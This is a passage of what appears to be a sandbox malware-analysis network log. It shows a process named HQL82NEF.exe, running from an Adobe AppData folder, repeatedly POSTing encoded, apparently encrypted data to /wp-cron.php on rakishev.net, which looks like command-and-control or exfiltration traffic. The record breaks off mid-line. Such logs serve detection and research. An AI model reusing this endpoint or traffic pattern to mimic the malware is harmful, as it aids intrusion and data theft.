2023-10-03 20:37:43 UTC	3632	OUT	Data Raw: 53 43 70 7a 52 78 73 38 56 4c 65 4f 4a 64 76 75 42 4c 44 67 79 2f 62 65 65 77 6a 56 4f 4d 6f 63 4c 66 75 7a 78 78 48 2f 32 52 64 59 41 4f 73 67 41 35 25 32 42 4c 6e 35 33 76 33 68 66 47 57 44 73 68 4b 70 79 56 50 38 72 46 52 4c 6c 58 73 79 64 33 65 61 73 36 66 6e 33 6f 49 4f 46 6a 47 25 32 42 6d 63 61 68 4f 41 78 4e 5a 72 53 6e 38 69 61 4b 4d 55 25 32 42 2f 57 77 68 32 7a 79 78 66 56 72 4f 37 70 56 69 63 37 44 67 49 68 42 53 67 4d 64 44 75 68 76 51 35 4d 4f 69 75 4b 4b 58 47 57 78 57 4a 4a 56 50 32 53 73 50 39 4a 55 55 59 43 6d 75 4f 41 61 66 61 6e 36 35 57 48 6b 4b 31 75 35 43 4e 4e 7a 42 31 64 39 2f 45 32 31 6c 6e 59 38 42 55 65 4b 69 4d 49 6c 57 30 47 35 6f 51 4a 56 44 75 34 46 77 6f 56 76 43 46 37 33 34 64 44 31 49 76 30 55 79 72 45 6d 42 6f 6d 6e 71 Data Ascii: SCpzRxs8VLeOJdvuBLDgy/beewjVOMocLfuzxxH/2RdYAOsgA5%2BLn53v3hfGWDshKpyVP8rFRLlXsyd3eas6fn3oIOFjG%2BmcahOAxNZrSn8iaKMU%2B/Wwh2zyxfVrO7pVic7DgIhBSgMdDuhvQ5MOiuKKXGWxWJJVP2SsP9JUUYCmuOAafan65WHkK1u5CNNzB1d9/E21lnY8BUeKiMIlW0G5oQJVDu4FwoVvCF734dD1Iv0UyrEmBomnq
2023-10-03 20:37:43 UTC	3648	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:37:43 UTC	3648	OUT	Data Raw: 4d 79 62 46 59 48 6d 72 49 37 42 6c 37 31 45 46 6f 6b 54 31 6c 47 54 66 78 4f 69 36 67 7a 77 65 64 56 41 51 63 54 54 62 35 51 49 71 70 38 44 76 74 58 30 69 63 62 2f 72 34 55 52 30 6c 44 39 59 69 59 25 32 42 57 48 37 55 35 37 53 6e 45 52 43 42 48 4e 47 32 39 38 4d 66 70 64 25 32 42 67 64 59 71 54 78 5a 6f 79 31 32 55 2f 6f 68 53 6f 74 35 6b 41 6c 35 68 39 64 4d 77 64 34 35 42 36 74 48 39 42 53 76 36 7a 52 37 72 37 63 59 44 70 67 4c 53 4c 45 73 2f 4c 25 32 42 72 36 37 71 65 49 7a 34 44 6f 4f 4e 6b 77 31 43 46 2f 47 72 6e 78 41 32 63 6f 47 66 59 32 41 4c 47 42 51 66 4c 4b 58 52 39 49 54 50 64 6c 71 53 61 74 41 78 53 6d 33 55 56 56 47 61 6e 34 34 48 6a 50 74 64 59 73 6a 70 46 63 4f 4f 41 51 4f 30 25 32 42 64 76 44 33 41 61 62 48 54 67 5a 51 4d 4c 4b 34 76 4f Data Ascii: MybFYHmrI7Bl71EFokT1lGTfxOi6gzwedVAQcTTb5QIqp8DvtX0icb/r4UR0lD9YiY%2BWH7U57SnERCBHNG298Mfpd%2BgdYqTxZoy12U/ohSot5kAl5h9dMwd45B6tH9BSv6zR7r7cYDpgLSLEs/L%2Br67qeIz4DoONkw1CF/GrnxA2coGfY2ALGBQfLKXR9ITPdlqSatAxSm3UVVGan44HjPtdYsjpFcOOAQO0%2BdvD3AabHTgZQMLK4vO
2023-10-03 20:37:43 UTC	3664	OUT	Data Raw: 61 Data Ascii: a
2023-10-03 20:37:43 UTC	3664	OUT	Data Raw: 63 79 4e 32 75 32 35 64 57 5a 66 53 55 73 30 54 64 59 73 47 7a 49 45 6d 36 63 4c 39 4d 54 36 6a 4d 4a 4b 78 35 49 71 35 30 77 7a 47 63 77 77 50 34 78 76 41 30 2f 64 46 57 45 55 61 64 53 38 75 65 6f 67 32 4d 6e 61 50 48 6b 52 65 73 58 71 48 57 69 25 32 42 73 4f 4f 46 41 67 66 46 6f 41 78 2f 38 5a 37 4c 4f 34 75 51 55 4d 55 4c 2f 47 4f 74 66 54 7a 5a 78 68 52 2f 56 72 36 42 46 78 63 78 41 30 46 67 35 4c 72 70 51 65 55 69 55 59 33 79 42 31 4e 73 72 25 32 42 72 6b 58 61 48 73 59 65 4e 64 5a 6b 6c 62 6d 4e 79 73 6f 31 52 4d 4c 54 33 4a 61 54 25 32 42 46 70 37 69 77 49 33 78 56 54 67 51 6d 78 37 4c 46 58 48 31 64 59 41 2f 69 35 43 72 4a 43 65 4d 76 79 79 75 2f 34 61 69 63 76 6b 70 76 66 50 48 73 42 4d 55 32 75 41 61 48 79 77 66 65 34 4b 63 54 35 66 69 68 44 71 Data Ascii: cyN2u25dWZfSUs0TdYsGzIEm6cL9MT6jMJKx5Iq50wzGcwwP4xvA0/dFWEUadS8ueog2MnaPHkResXqHWi%2BsOOFAgfFoAx/8Z7LO4uQUMUL/GOtfTzZxhR/Vr6BFxcxA0Fg5LrpQeUiUY3yB1Nsr%2BrkXaHsYeNdZklbmNyso1RMLT3JaT%2BFp7iwI3xVTgQmx7LFXH1dYA/i5CrJCeMvyyu/4aicvkpvfPHsBMU2uAaHywfe4KcT5fihDq
2023-10-03 20:37:43 UTC	3680	OUT	Data Raw: 45 Data Ascii: E
2023-10-03 20:37:43 UTC	3680	OUT	Data Raw: 7a 39 50 31 5a 31 36 37 35 63 4c 45 50 42 33 53 49 66 35 75 47 79 6e 4a 36 5a 37 4c 44 6d 54 58 47 6d 63 46 42 53 4e 52 46 74 4b 7a 52 49 58 31 66 4c 38 31 61 75 43 52 34 58 47 50 4b 41 5a 43 57 6f 4f 75 4c 5a 6d 59 6f 47 45 78 6d 69 76 4d 6d 25 32 42 69 68 65 65 43 30 41 52 50 45 44 46 4b 33 6f 67 58 6f 64 47 49 73 57 45 4d 6d 79 35 74 44 44 2f 79 46 44 44 41 74 49 7a 62 6a 74 69 58 61 4d 6b 56 54 43 69 68 6a 39 59 75 36 30 43 67 46 39 36 6d 4e 37 77 53 4b 46 50 63 6a 52 45 48 75 4d 7a 6c 51 4f 4c 73 59 34 33 75 4f 4f 47 66 72 63 54 61 69 65 32 37 4b 77 6c 6f 46 5a 7a 7a 77 6f 73 44 48 34 35 42 78 30 62 35 79 52 4f 69 78 41 44 61 77 47 59 67 49 46 55 44 48 35 64 6e 4f 54 4d 70 74 74 4c 69 33 51 69 71 78 38 5a 55 32 4e 6d 4f 59 67 2f 49 38 41 38 76 66 37 Data Ascii: z9P1Z1675cLEPB3SIf5uGynJ6Z7LDmTXGmcFBSNRFtKzRIX1fL81auCR4XGPKAZCWoOuLZmYoGExmivMm%2BiheeC0ARPEDFK3ogXodGIsWEMmy5tDD/yFDDAtIzbjtiXaMkVTCihj9Yu60CgF96mN7wSKFPcjREHuMzlQOLsY43uOOGfrcTaie27KwloFZzzwosDH45Bx0b5yROixADawGYgIFUDH5dnOTMpttLi3Qiqx8ZU2NmOYg/I8A8vf7
2023-10-03 20:37:44 UTC	3695	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:37:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fhaUHK8zRNhPOxgaDzopZRqeRxTPiNrNzVWagzQ%2FwDojQIR8IN0xVC%2F10Yxmwt1onyAy9jkfiLx01au%2BztYQWBM0XA53EwSYberItrWqXB0g7HhsjxI8DeGEWH1Xi%2BM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fc147b2a081c-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.4	49890	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:37:43 UTC	3583	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 324 Expect: 100-continue
2023-10-03 20:37:43 UTC	3584	IN	HTTP/1.1 100 Continue
2023-10-03 20:37:43 UTC	3584	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:37:43 UTC	3584	OUT	Data Raw: 3d 72 71 36 35 62 59 64 34 75 48 47 65 6d 48 70 63 48 6b 33 37 67 56 78 59 33 46 33 4a 4b 57 42 25 32 42 2f 4c 69 67 6f 6e 4f 76 67 38 5a 42 71 4c 72 61 73 59 71 36 77 6f 78 63 33 6a 55 38 6c 72 48 76 54 4a 35 42 33 34 57 25 32 42 7a 78 4b 6e 64 44 43 66 6c 61 73 54 51 68 66 52 54 4a 71 35 66 32 43 55 64 49 75 39 54 4f 32 71 70 61 4d 47 6a 5a 32 2f 59 6e 6b 56 61 63 37 54 36 25 32 42 6c 47 34 64 39 4f 53 54 4f 69 39 41 4e 4b 6d 7a 69 7a 73 39 4a 34 75 4f 70 38 75 31 32 78 58 43 35 6e 58 36 59 66 2f 38 46 72 37 53 73 57 59 56 6e 6e 36 47 65 54 61 6b 56 75 6e 31 25 32 42 79 61 61 46 63 77 5a 54 66 56 4b 39 51 4b 58 34 71 4e 2f 30 2f 61 47 4e 6e 64 45 38 59 65 6f 33 70 43 63 67 45 63 43 4e 4c 44 53 43 63 39 64 42 38 75 62 68 25 32 42 77 35 69 53 6a 79 64 59 Data Ascii: =rq65bYd4uHGemHpcHk37gVxY3F3JKWB%2B/LigonOvg8ZBqLrasYq6woxc3jU8lrHvTJ5B34W%2BzxKndDCflasTQhfRTJq5f2CUdIu9TO2qpaMGjZ2/YnkVac7T6%2BlG4d9OSTOi9ANKmzizs9J4uOp8u12xXC5nX6Yf/8Fr7SsWYVnn6GeTakVun1%2ByaaFcwZTfVK9QKX4qN/0/aGNndE8Yeo3pCcgEcCNLDSCc9dB8ubh%2Bw5iSjydY
2023-10-03 20:37:44 UTC	3695	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:37:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XxtjM7Sox0cfAu5qCKMobImYATwmBTll3OG%2BVKnUcCfDgQwjBjY1KBx4c5TxC7PCaq0Sx67WufRxGMnS%2F8a7suUgkxXVqHc5omVGoYy6ZyNlddKzy6Yio%2FAe%2FTaeg2w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fc147a445979-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.4	49893	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:37:56 UTC	3696	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 280 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:37:57 UTC	3697	IN	HTTP/1.1 100 Continue
2023-10-03 20:37:57 UTC	3697	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:37:57 UTC	3697	OUT	Data Raw: 3d 6b 45 42 35 7a 77 54 78 44 74 45 41 6f 59 7a 46 54 62 6f 55 4d 73 4e 4d 32 73 69 43 75 70 43 65 2f 6d 78 70 52 72 4a 4c 72 4f 68 25 32 42 36 31 31 64 42 69 65 6b 72 4a 74 34 38 51 4e 56 6a 4c 77 76 34 53 33 34 59 5a 39 79 62 54 31 4d 6a 6a 45 32 36 70 52 4a 52 45 69 7a 62 49 39 79 6a 30 44 47 55 45 5a 6e 61 61 67 47 73 52 79 72 70 58 67 59 6c 67 44 4c 42 4d 6c 71 76 45 67 4b 25 32 42 47 75 55 6a 53 45 75 30 73 73 66 4f 62 54 47 61 68 6f 46 59 6d 5a 52 37 44 66 4a 71 75 4d 4c 6f 49 47 58 74 4c 39 73 56 67 41 6f 64 42 38 65 58 74 43 39 7a 2f 44 44 66 5a 79 4a 47 72 46 30 44 46 70 4f 36 75 54 78 2f 45 52 45 34 69 37 64 25 32 42 62 4d 30 49 5a 73 34 41 44 6b 44 70 33 59 6d 59 44 35 37 38 25 32 42 56 49 35 47 25 32 42 39 47 58 78 63 4b 63 52 72 38 7a 65 6d Data Ascii: =kEB5zwTxDtEAoYzFTboUMsNM2siCupCe/mxpRrJLrOh%2B611dBiekrJt48QNVjLwv4S34YZ9ybT1MjjE26pRJREizbI9yj0DGUEZnaagGsRyrpXgYlgDLBMlqvEgK%2BGuUjSEu0ssfObTGahoFYmZR7DfJquMLoIGXtL9sVgAodB8eXtC9z/DDfZyJGrF0DFpO6uTx/ERE4i7d%2BbM0IZs4ADkDp3YmYD578%2BVI5G%2B9GXxcKcRr8zem
2023-10-03 20:37:57 UTC	3808	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:37:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PKuphC0XFTbQBXinhVhpQEETFWehBOmzUA4WGhbsJ2eBWNUYapnYMuUNeT2ffxdiAC2%2BTcvZ0Rn2RfpP6F6Y%2Bq8m6VK33CDWQHI7gABtpBzNbWY8j7zFE3VlU%2BGA5JU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fc682f4b5a09-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.4	49895	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:37:57 UTC	3696	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 112820 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:37:57 UTC	3697	IN	HTTP/1.1 100 Continue
2023-10-03 20:37:57 UTC	3697	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:37:57 UTC	3697	OUT	Data Raw: 3d 6d 77 6a 4f 70 4f 61 59 65 36 34 70 42 63 51 30 61 54 65 33 4d 4d 52 39 51 47 75 4e 6b 34 32 4e 55 4d 48 79 62 71 7a 58 75 78 67 6a 44 38 4d 65 61 71 4c 6e 49 56 54 6c 68 34 37 49 6f 71 4a 54 59 78 48 46 7a 66 2f 5a 51 74 70 70 78 37 4d 42 47 71 70 2f 25 32 42 79 71 35 4b 71 55 49 6f 66 47 55 4a 4a 6c 75 48 31 4b 35 42 73 65 4a 47 50 30 44 30 43 66 55 76 59 49 4d 72 39 62 78 66 43 58 68 76 45 49 48 32 6f 48 34 52 57 41 6a 32 37 4a 57 45 7a 42 58 46 78 58 36 36 71 31 4a 69 4e 41 54 48 33 79 31 39 47 6e 44 30 30 43 77 45 44 73 37 4b 32 61 47 77 57 41 68 6f 73 62 51 54 43 61 77 56 6b 2f 56 6c 41 58 78 4a 4d 4b 33 64 53 4f 78 35 76 59 59 79 46 4f 7a 7a 75 79 78 66 39 77 57 55 4d 43 52 35 4c 69 34 38 6a 25 32 42 69 68 79 5a 59 6c 66 46 73 48 65 65 79 36 70 Data Ascii: =mwjOpOaYe64pBcQ0aTe3MMR9QGuNk42NUMHybqzXuxgjD8MeaqLnIVTlh47IoqJTYxHFzf/ZQtppx7MBGqp/%2Byq5KqUIofGUJJluH1K5BseJGP0D0CfUvYIMr9bxfCXhvEIH2oH4RWAj27JWEzBXFxX66q1JiNATH3y19GnD00CwEDs7K2aGwWAhosbQTCawVk/VlAXxJMK3dSOx5vYYyFOzzuyxf9wWUMCR5Li48j%2BihyZYlfFsHeey6p
2023-10-03 20:37:57 UTC	3713	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:37:57 UTC	3713	OUT	Data Raw: 77 77 54 62 34 6e 47 79 43 35 73 75 71 61 57 6e 4c 49 67 74 6d 72 65 54 44 56 25 32 42 67 68 47 2f 31 63 57 55 51 66 75 36 62 56 6a 56 45 47 45 42 4a 6d 63 52 69 6d 43 33 35 6d 44 6f 47 77 4f 39 51 64 46 47 65 52 30 70 64 4d 56 5a 4e 25 32 42 73 4d 52 46 4f 75 57 41 44 39 2f 79 4a 57 48 62 36 71 35 4d 32 36 75 33 31 45 56 4a 35 35 6b 69 46 6d 50 63 76 6d 4d 59 51 4d 57 69 46 59 25 32 42 68 67 25 32 42 4d 6a 73 55 32 79 62 78 6e 48 79 37 74 78 48 78 4b 41 71 64 73 50 6e 48 63 67 2f 2f 4a 41 69 53 77 33 32 63 63 41 72 4d 70 61 68 68 57 74 59 31 50 77 52 50 64 4f 71 70 62 4d 71 74 74 4e 59 4d 55 6a 77 6a 34 4e 30 30 52 31 39 76 47 6d 67 5a 53 47 4d 63 4c 2f 64 44 6c 6a 79 68 75 6f 48 44 70 42 78 68 6c 45 6d 37 48 35 34 58 67 73 7a 51 42 66 47 35 70 50 35 44 Data Ascii: wwTb4nGyC5suqaWnLIgtmreTDV%2BghG/1cWUQfu6bVjVEGEBJmcRimC35mDoGwO9QdFGeR0pdMVZN%2BsMRFOuWAD9/yJWHb6q5M26u31EVJ55kiFmPcvmMYQMWiFY%2Bhg%2BMjsU2ybxnHy7txHxKAqdsPnHcg//JAiSw32ccArMpahhWtY1PwRPdOqpbMqttNYMUjwj4N00R19vGmgZSGMcL/dDljyhuoHDpBxhlEm7H54XgszQBfG5pP5D
2023-10-03 20:37:57 UTC	3729	OUT	Data Raw: 37 Data Ascii: 7
2023-10-03 20:37:57 UTC	3729	OUT	Data Raw: 50 47 58 2f 39 77 63 68 4f 2f 67 77 79 78 66 77 64 45 54 71 31 68 35 4f 6a 6c 76 4a 77 4e 2f 35 67 6d 48 64 63 30 79 2f 79 4a 42 25 32 42 55 2f 51 44 73 71 79 5a 44 4e 52 74 58 32 66 73 66 25 32 42 6e 32 47 6d 65 34 4d 45 56 78 43 7a 6f 67 75 6b 36 74 6c 4e 66 4b 37 4c 73 4c 6e 57 78 32 62 7a 70 34 37 6b 66 54 73 6d 56 76 6e 79 73 37 56 2f 53 6f 71 39 30 55 6a 53 45 4d 43 48 52 4c 73 58 4b 64 45 37 6c 65 77 39 33 4c 50 42 41 39 69 51 72 4a 56 64 34 63 6b 58 79 4a 4e 64 49 4f 51 76 68 31 77 33 33 46 4e 6d 33 49 58 47 6c 78 73 68 6c 78 32 67 43 62 6f 53 73 6c 49 48 4f 62 67 36 54 72 32 67 38 63 33 31 77 4a 54 38 6b 4a 6f 6a 62 55 72 55 30 68 68 43 42 61 43 6a 58 59 37 55 49 4f 61 64 67 74 74 63 6d 66 32 6a 50 36 73 35 2f 68 77 42 62 32 74 58 4d 47 50 2f 59 Data Ascii: PGX/9wchO/gwyxfwdETq1h5OjlvJwN/5gmHdc0y/yJB%2BU/QDsqyZDNRtX2fsf%2Bn2Gme4MEVxCzoguk6tlNfK7LsLnWx2bzp47kfTsmVvnys7V/Soq90UjSEMCHRLsXKdE7lew93LPBA9iQrJVd4ckXyJNdIOQvh1w33FNm3IXGlxshlx2gCboSslIHObg6Tr2g8c31wJT8kJojbUrU0hhCBaCjXY7UIOadgttcmf2jP6s5/hwBb2tXMGP/Y
2023-10-03 20:37:57 UTC	3745	OUT	Data Raw: 5a Data Ascii: Z
2023-10-03 20:37:57 UTC	3745	OUT	Data Raw: 53 43 70 7a 52 78 73 38 56 4c 65 4f 4a 64 76 75 42 4c 44 67 79 2f 62 65 65 77 6a 56 4f 4d 6f 63 4c 66 75 7a 78 78 48 2f 32 52 64 59 41 4f 73 67 41 35 25 32 42 4c 6e 35 33 76 33 68 66 47 57 44 73 68 4b 70 79 56 50 38 72 46 52 4c 6c 58 73 79 64 33 65 61 73 36 66 6e 33 6f 49 4f 46 6a 47 25 32 42 6d 63 61 68 4f 41 78 4e 5a 72 53 6e 38 69 61 4b 4d 55 25 32 42 2f 57 77 68 32 7a 79 78 66 56 72 4f 37 70 56 69 63 37 44 67 49 68 42 53 67 4d 64 44 75 68 76 51 35 4d 4f 69 75 4b 4b 58 47 57 78 57 4a 4a 56 50 32 53 73 50 39 4a 55 55 59 43 6d 75 4f 41 61 66 61 6e 36 35 57 48 6b 4b 31 75 35 43 4e 4e 7a 42 31 64 39 2f 45 32 31 6c 6e 59 38 42 55 65 4b 69 4d 49 6c 57 30 47 35 6f 51 4a 56 44 75 34 46 77 6f 56 76 43 46 37 33 34 64 44 31 49 76 30 55 79 72 45 6d 42 6f 6d 6e 71 Data Ascii: SCpzRxs8VLeOJdvuBLDgy/beewjVOMocLfuzxxH/2RdYAOsgA5%2BLn53v3hfGWDshKpyVP8rFRLlXsyd3eas6fn3oIOFjG%2BmcahOAxNZrSn8iaKMU%2B/Wwh2zyxfVrO7pVic7DgIhBSgMdDuhvQ5MOiuKKXGWxWJJVP2SsP9JUUYCmuOAafan65WHkK1u5CNNzB1d9/E21lnY8BUeKiMIlW0G5oQJVDu4FwoVvCF734dD1Iv0UyrEmBomnq
2023-10-03 20:37:57 UTC	3761	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:37:57 UTC	3761	OUT	Data Raw: 4d 79 62 46 59 48 6d 72 49 37 42 6c 37 31 45 46 6f 6b 54 31 6c 47 54 66 78 4f 69 36 67 7a 77 65 64 56 41 51 63 54 54 62 35 51 49 71 70 38 44 76 74 58 30 69 63 62 2f 72 34 55 52 30 6c 44 39 59 69 59 25 32 42 57 48 37 55 35 37 53 6e 45 52 43 42 48 4e 47 32 39 38 4d 66 70 64 25 32 42 67 64 59 71 54 78 5a 6f 79 31 32 55 2f 6f 68 53 6f 74 35 6b 41 6c 35 68 39 64 4d 77 64 34 35 42 36 74 48 39 42 53 76 36 7a 52 37 72 37 63 59 44 70 67 4c 53 4c 45 73 2f 4c 25 32 42 72 36 37 71 65 49 7a 34 44 6f 4f 4e 6b 77 31 43 46 2f 47 72 6e 78 41 32 63 6f 47 66 59 32 41 4c 47 42 51 66 4c 4b 58 52 39 49 54 50 64 6c 71 53 61 74 41 78 53 6d 33 55 56 56 47 61 6e 34 34 48 6a 50 74 64 59 73 6a 70 46 63 4f 4f 41 51 4f 30 25 32 42 64 76 44 33 41 61 62 48 54 67 5a 51 4d 4c 4b 34 76 4f Data Ascii: MybFYHmrI7Bl71EFokT1lGTfxOi6gzwedVAQcTTb5QIqp8DvtX0icb/r4UR0lD9YiY%2BWH7U57SnERCBHNG298Mfpd%2BgdYqTxZoy12U/ohSot5kAl5h9dMwd45B6tH9BSv6zR7r7cYDpgLSLEs/L%2Br67qeIz4DoONkw1CF/GrnxA2coGfY2ALGBQfLKXR9ITPdlqSatAxSm3UVVGan44HjPtdYsjpFcOOAQO0%2BdvD3AabHTgZQMLK4vO
2023-10-03 20:37:57 UTC	3777	OUT	Data Raw: 61 Data Ascii: a
2023-10-03 20:37:57 UTC	3777	OUT	Data Raw: 63 79 4e 32 75 32 35 64 57 5a 66 53 55 73 30 54 64 59 73 47 7a 49 45 6d 36 63 4c 39 4d 54 36 6a 4d 4a 4b 78 35 49 71 35 30 77 7a 47 63 77 77 50 34 78 76 41 30 2f 64 46 57 45 55 61 64 53 38 75 65 6f 67 32 4d 6e 61 50 48 6b 52 65 73 58 71 48 57 69 25 32 42 73 4f 4f 46 41 67 66 46 6f 41 78 2f 38 5a 37 4c 4f 34 75 51 55 4d 55 4c 2f 47 4f 74 66 54 7a 5a 78 68 52 2f 56 72 36 42 46 78 63 78 41 30 46 67 35 4c 72 70 51 65 55 69 55 59 33 79 42 31 4e 73 72 25 32 42 72 6b 58 61 48 73 59 65 4e 64 5a 6b 6c 62 6d 4e 79 73 6f 31 52 4d 4c 54 33 4a 61 54 25 32 42 46 70 37 69 77 49 33 78 56 54 67 51 6d 78 37 4c 46 58 48 31 64 59 41 2f 69 35 43 72 4a 43 65 4d 76 79 79 75 2f 34 61 69 63 76 6b 70 76 66 50 48 73 42 4d 55 32 75 41 61 48 79 77 66 65 34 4b 63 54 35 66 69 68 44 71 Data Ascii: cyN2u25dWZfSUs0TdYsGzIEm6cL9MT6jMJKx5Iq50wzGcwwP4xvA0/dFWEUadS8ueog2MnaPHkResXqHWi%2BsOOFAgfFoAx/8Z7LO4uQUMUL/GOtfTzZxhR/Vr6BFxcxA0Fg5LrpQeUiUY3yB1Nsr%2BrkXaHsYeNdZklbmNyso1RMLT3JaT%2BFp7iwI3xVTgQmx7LFXH1dYA/i5CrJCeMvyyu/4aicvkpvfPHsBMU2uAaHywfe4KcT5fihDq
2023-10-03 20:37:57 UTC	3793	OUT	Data Raw: 45 Data Ascii: E
2023-10-03 20:37:57 UTC	3793	OUT	Data Raw: 7a 39 50 31 5a 31 36 37 35 63 4c 45 50 42 33 53 49 66 35 75 47 79 6e 4a 36 5a 37 4c 44 6d 54 58 47 6d 63 46 42 53 4e 52 46 74 4b 7a 52 49 58 31 66 4c 38 31 61 75 43 52 34 58 47 50 4b 41 5a 43 57 6f 4f 75 4c 5a 6d 59 6f 47 45 78 6d 69 76 4d 6d 25 32 42 69 68 65 65 43 30 41 52 50 45 44 46 4b 33 6f 67 58 6f 64 47 49 73 57 45 4d 6d 79 35 74 44 44 2f 79 46 44 44 41 74 49 7a 62 6a 74 69 58 61 4d 6b 56 54 43 69 68 6a 39 59 75 36 30 43 67 46 39 36 6d 4e 37 77 53 4b 46 50 63 6a 52 45 48 75 4d 7a 6c 51 4f 4c 73 59 34 33 75 4f 4f 47 66 72 63 54 61 69 65 32 37 4b 77 6c 6f 46 5a 7a 7a 77 6f 73 44 48 34 35 42 78 30 62 35 79 52 4f 69 78 41 44 61 77 47 59 67 49 46 55 44 48 35 64 6e 4f 54 4d 70 74 74 4c 69 33 51 69 71 78 38 5a 55 32 4e 6d 4f 59 67 2f 49 38 41 38 76 66 37 Data Ascii: z9P1Z1675cLEPB3SIf5uGynJ6Z7LDmTXGmcFBSNRFtKzRIX1fL81auCR4XGPKAZCWoOuLZmYoGExmivMm%2BiheeC0ARPEDFK3ogXodGIsWEMmy5tDD/yFDDAtIzbjtiXaMkVTCihj9Yu60CgF96mN7wSKFPcjREHuMzlQOLsY43uOOGfrcTaie27KwloFZzzwosDH45Bx0b5yROixADawGYgIFUDH5dnOTMpttLi3Qiqx8ZU2NmOYg/I8A8vf7
2023-10-03 20:37:58 UTC	3809	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:37:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YluAcVGgcc65%2Blz7XkKBRuWPeBNW3RqWzW6UcdlR%2BGtiXiZ7iQ94v1nOL9y13bcbmKLWt43lD6Zlo0T2pPHgxL5u93L%2F1%2BKVDLllnD%2FJBuWnZDd%2BE827hW5VFZs5UjU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fc684df52d06-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.4	49894	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:37:57 UTC	3697	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 324 Expect: 100-continue
2023-10-03 20:37:57 UTC	3697	IN	HTTP/1.1 100 Continue
2023-10-03 20:37:57 UTC	3713	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:37:57 UTC	3713	OUT	Data Raw: 3d 72 71 36 35 62 59 64 34 75 48 47 65 6d 48 70 63 48 6b 33 37 67 56 78 59 33 46 33 4a 4b 57 42 25 32 42 2f 4c 69 67 6f 6e 4f 76 67 38 5a 42 71 4c 72 61 73 59 71 36 77 6f 78 63 33 6a 55 38 6c 72 48 76 54 4a 35 42 33 34 57 25 32 42 7a 78 4b 6e 64 44 43 66 6c 61 73 54 51 6c 4a 38 61 44 37 37 6f 64 30 56 65 6f 56 4f 35 6a 63 55 4f 37 76 76 6b 73 72 66 76 50 31 47 66 38 37 54 36 25 32 42 6c 47 34 64 39 4f 53 54 4f 69 39 41 4e 4b 6d 7a 69 7a 73 39 4a 34 75 4f 70 38 75 31 32 78 58 43 35 6e 58 36 59 66 2f 38 46 72 37 53 73 57 59 56 6e 6e 36 47 65 54 61 6b 56 75 6e 31 25 32 42 79 61 61 46 63 77 5a 54 66 56 4b 39 51 4b 58 34 